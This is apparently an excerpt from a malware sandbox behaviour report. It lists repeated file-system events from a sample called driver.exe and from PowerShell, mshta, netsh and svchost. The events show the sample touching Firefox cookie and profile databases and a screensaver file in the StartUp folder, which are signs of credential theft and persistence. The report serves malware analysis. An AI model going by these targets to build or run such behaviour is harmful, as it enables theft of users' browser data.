              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\Desktop\driver.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
